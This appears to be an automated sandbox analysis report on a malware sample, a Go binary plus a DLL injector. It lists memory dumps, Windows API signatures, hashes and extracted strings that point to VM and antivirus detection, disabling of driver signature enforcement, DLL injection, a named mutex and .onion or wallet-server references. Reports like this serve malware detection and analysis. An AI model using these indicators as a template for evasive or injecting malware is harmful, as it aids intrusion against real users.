                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                      • API String ID: 0-2405844374
                                                                      • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                                      • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                                      • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                                      • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                      • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                      • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.665663316.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                      • API String ID: 0-626581767
                                                                      • Opcode ID: 6e96d87cef3c5bae39166ccbc9028f97707ed74f2647afd307d3e15fdb542bad
                                                                      • Instruction ID: 1013df02f7d93c665873b684ece9a7c5afc7bb6a550ead538736935ac93b2926
                                                                      • Opcode Fuzzy Hash: 6e96d87cef3c5bae39166ccbc9028f97707ed74f2647afd307d3e15fdb542bad
                                                                      • Instruction Fuzzy Hash: 9C51E4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                      • ", xrefs: 00428CF9
                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                      • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                      • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                      • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.925921551.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                      • API String ID: 0-2405844374
                                                                      • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                                      • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                                      • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                                      • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                      • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                      • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.925921551.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                      • API String ID: 0-626581767
                                                                      • Opcode ID: 6e96d87cef3c5bae39166ccbc9028f97707ed74f2647afd307d3e15fdb542bad
                                                                      • Instruction ID: 1013df02f7d93c665873b684ece9a7c5afc7bb6a550ead538736935ac93b2926
                                                                      • Opcode Fuzzy Hash: 6e96d87cef3c5bae39166ccbc9028f97707ed74f2647afd307d3e15fdb542bad
                                                                      • Instruction Fuzzy Hash: 9C51E4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ErrorLast$Create$CloseFirstHandleMutexOpenProcessProcess32SleepSnapshotToolhelp32
                                                                      • String ID: ID: $) terminated$, (pid: $DLL filename: $Global\qtxp9g8w$failed to inject DLL: $failed to open process: $failed to wait for an object: $injected$not enough arguments$process $process name:
                                                                      • API String ID: 1655518464-3362440526
                                                                      • Opcode ID: 811615c686dd7e2b8bf127d5529c178edcab6273597339bb3635e6138e25b633
                                                                      • Instruction ID: c1096fdcf5052783f386d3e1c5ff1f774a550a16c7b86983e29a0e2bac65211e
                                                                      • Opcode Fuzzy Hash: 811615c686dd7e2b8bf127d5529c178edcab6273597339bb3635e6138e25b633
                                                                      • Instruction Fuzzy Hash: B3B15E21A09E0741EA94EB26ECD41BA23A1AF87FB4F504135DA1EC73E6DF7CE4459340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 59578552-0
                                                                      • Opcode ID: 72b3a8404d0a84c89e3a6d66c54a9fe62843eebc84389721f4a6ca630a818792
                                                                      • Instruction ID: 35998d20d51529b7b687796f846f64ef573883b590e5e04788f380aa5b9ff34e
                                                                      • Opcode Fuzzy Hash: 72b3a8404d0a84c89e3a6d66c54a9fe62843eebc84389721f4a6ca630a818792
                                                                      • Instruction Fuzzy Hash: CFE0B631E5DD4382E5993A7988C20BC21901FCBB30FA00235E12DC32C2CD1EF5925B6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6148A31F1
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6148A316F,?,?,FFFFFFFE,00007FF6148A2196), ref: 00007FF6148A32B0
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6148A316F,?,?,FFFFFFFE,00007FF6148A2196), ref: 00007FF6148A3330
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2210144848-0
                                                                      • Opcode ID: 26715ff7cc39d96f6d37d079edff232458c65da7b58ef50fd20d28b75933661f
                                                                      • Instruction ID: 6f939683216445652f4f2aba05db0152665e31555fb6dbf74714257cd4b5b923
                                                                      • Opcode Fuzzy Hash: 26715ff7cc39d96f6d37d079edff232458c65da7b58ef50fd20d28b75933661f
                                                                      • Instruction Fuzzy Hash: 7A81A022A18E1289FB909F69D4C06BD6760BF46FA4FA44136DA0E936E1DFFDE445C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: String$try_get_function
                                                                      • String ID: LCMapStringEx
                                                                      • API String ID: 1203122356-3893581201
                                                                      • Opcode ID: 05fa366c2c50fcaac7f6a3aea4bc55e8ad76e5a7ce2bd5e93f4c74efa4b9c7c3
                                                                      • Instruction ID: 9df2ce5cbd9501d40edeb404ae631e37353d8aea4c5e6e166185a16328ab3183
                                                                      • Opcode Fuzzy Hash: 05fa366c2c50fcaac7f6a3aea4bc55e8ad76e5a7ce2bd5e93f4c74efa4b9c7c3
                                                                      • Instruction Fuzzy Hash: 45113035608B8186D7A0CB45B48029AB7A5FBC9BD4F544135EECD83B69CF3CD440CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 1321466686-0
                                                                      • Opcode ID: b36c17e84833c21c762e081d6501b26afe2fad55a0ffcd1e741a5b10ca06fde9
                                                                      • Instruction ID: ac6e8e3465698d2dd5a3c9d64d8faaac132b46f1eb3c0a42e74228219b92cf4e
                                                                      • Opcode Fuzzy Hash: b36c17e84833c21c762e081d6501b26afe2fad55a0ffcd1e741a5b10ca06fde9
                                                                      • Instruction Fuzzy Hash: 89312E21A0CE4342FAD4AB25D4D13B922D1AF87FA4F944035EA4EC72E7DE6DE8469701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-3916222277
                                                                      • Opcode ID: 116468216eb2aa1a53ccbbaba1d54fe37ab03232ed46faac14ba305c4149df92
                                                                      • Instruction ID: 98834b7337f7930d30dbfc452ac27a2dcbb26a2bd0e3e1c35f5864a4e4c13f77
                                                                      • Opcode Fuzzy Hash: 116468216eb2aa1a53ccbbaba1d54fe37ab03232ed46faac14ba305c4149df92
                                                                      • Instruction Fuzzy Hash: 8651E432A1CA818AE790CF24D0843AD7BA0FB96B58F644135E6CD8769DCFACD545CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FF6148A632C: GetOEMCP.KERNEL32 ref: 00007FF6148A6356
                                                                      • IsValidCodePage.KERNEL32(?,?,?,?,00000000,?,?,00007FF6148A6703), ref: 00007FF6148A6983
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,00000000,?,?,00007FF6148A6703), ref: 00007FF6148A69CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID:
                                                                      • API String ID: 546120528-0
                                                                      • Opcode ID: 3ff8ca631ef86ca6f5c2971fb809097506687484789c91c91567844e6540621b
                                                                      • Instruction ID: dcde04cf8a1faa9b87cb06bdf3606fbe1879515b28aafdd8f7e72a446886518e
                                                                      • Opcode Fuzzy Hash: 3ff8ca631ef86ca6f5c2971fb809097506687484789c91c91567844e6540621b
                                                                      • Instruction Fuzzy Hash: E981E662E0CA4246F7E59F2594C017977A1BF92F68F688035C6CE932E8DEBDF5568300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID:
                                                                      • API String ID: 442123175-0
                                                                      • Opcode ID: 2159cee63f332e5b4ef3014310ffb607f38b8ad07de57b11d7bdfdf344f7b23a
                                                                      • Instruction ID: 7e6efc48991eb253afd3e12cf501a5fa24bb3be231864460c26c65050e2bebd9
                                                                      • Opcode Fuzzy Hash: 2159cee63f332e5b4ef3014310ffb607f38b8ad07de57b11d7bdfdf344f7b23a
                                                                      • Instruction Fuzzy Hash: E631F532A18E958ADBA09F25E4806E977A0FF4ABA0F544032EB4DC37A5DF7CD552C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: FileHandleType
                                                                      • String ID:
                                                                      • API String ID: 3000768030-0
                                                                      • Opcode ID: beb213435944418b0a7098a92ff191e542922997e08339a2c1c5f459433f9161
                                                                      • Instruction ID: 008e7871d0f106a805099dd5ee76a33b8b98098ef25b7460ca22b3e4daf850ce
                                                                      • Opcode Fuzzy Hash: beb213435944418b0a7098a92ff191e542922997e08339a2c1c5f459433f9161
                                                                      • Instruction Fuzzy Hash: B3314222E18E5781DBA88B15D5E01786650EB86FB0F681339EB6E873E1CF39E451D340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                      • String ID:
                                                                      • API String ID: 3548387204-0
                                                                      • Opcode ID: beeffec749e308ffe16c81bd6835906fce2e0c19b55cd94a619cec8060cc76ba
                                                                      • Instruction ID: 869d144f26e8ec77ef8cce40224a96b9e07747dee20bd02d79eb1483eed2e271
                                                                      • Opcode Fuzzy Hash: beeffec749e308ffe16c81bd6835906fce2e0c19b55cd94a619cec8060cc76ba
                                                                      • Instruction Fuzzy Hash: 25117F24E08D0751FAE87BB589D22BC11915F97F30F840834E95DD76C7ED1DF846A262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF61489B426,?,?,?,00007FF61489B756,?,?,?,?,00007FF61488D9C7), ref: 00007FF6148A6BE8
                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF61489B426,?,?,?,00007FF61489B756,?,?,?,?,00007FF61488D9C7), ref: 00007FF6148A6C55
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free
                                                                      • String ID:
                                                                      • API String ID: 3328510275-0
                                                                      • Opcode ID: f3b4e8fa6f374aedebf4be775062589700bbe60ef5d21c987c82f8d63f2b11fc
                                                                      • Instruction ID: 00a70c36e1fb24d6b64a0905c3fb7f3064e85e36293315148d2ef6c5be0b11b9
                                                                      • Opcode Fuzzy Hash: f3b4e8fa6f374aedebf4be775062589700bbe60ef5d21c987c82f8d63f2b11fc
                                                                      • Instruction Fuzzy Hash: 8401C811B44E5189DEA5EF2568840AA6660FF45FF4F5C8234EE6E577D9DE6CE4408200
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 92a02608e7d5cc3b1a72d0863b405d3436dfc242bcde27ac4506125b857c04a8
                                                                      • Instruction ID: 0f964241a1e94d4315e874232cac1657a5b58e9ca6dc6e508b21264fb2e6de3f
                                                                      • Opcode Fuzzy Hash: 92a02608e7d5cc3b1a72d0863b405d3436dfc242bcde27ac4506125b857c04a8
                                                                      • Instruction Fuzzy Hash: 9421A122E18E4296E681AF15D8C537D2650AF86FB0FA54535F91D873E2CFFCE4418710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF61489EF39,?,?,0000E117BC86E4D3,00007FF6148957A9,?,?,?,?,00007FF6148A507E,?,?,00000000), ref: 00007FF61489E5C1
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 808467561-2761157908
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • TranslateName.LIBCMT ref: 00007FF6148A905D
                                                                      • TranslateName.LIBCMT ref: 00007FF6148A9098
                                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF61489C414), ref: 00007FF6148A90DD
                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF61489C414), ref: 00007FF6148A9105
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                                      • String ID: utf8
                                                                      • API String ID: 2136749100-905460609
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                      • String ID:
                                                                      • API String ID: 3939093798-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite$Console
                                                                      • String ID:
                                                                      • API String ID: 786612050-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 1502251526-3924258884
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                      • String ID: %
                                                                      • API String ID: 3668304517-2567322570
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                      • String ID: %
                                                                      • API String ID: 3668304517-2567322570
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Wcsftime$_invalid_parameter_noinfo
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 4239037671-3924258884
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: InfoLocaletry_get_function
                                                                      • String ID: GetLocaleInfoEx
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6148A9510
                                                                        • Part of subcall function 00007FF6148A5898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6148A58B5
                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6148A9559
                                                                        • Part of subcall function 00007FF6148A5898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6148A590E
                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6148A9624
                                                                      Similarity
                                                                      • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: gfffffff
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF61489F939
                                                                        • Part of subcall function 00007FF6148956A0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF61489564D), ref: 00007FF6148956A9
                                                                        • Part of subcall function 00007FF6148956A0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF61489564D), ref: 00007FF6148956CE
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                      • String ID: -
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ExceptionRaise_clrfp
                                                                      • String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      Uniqueness

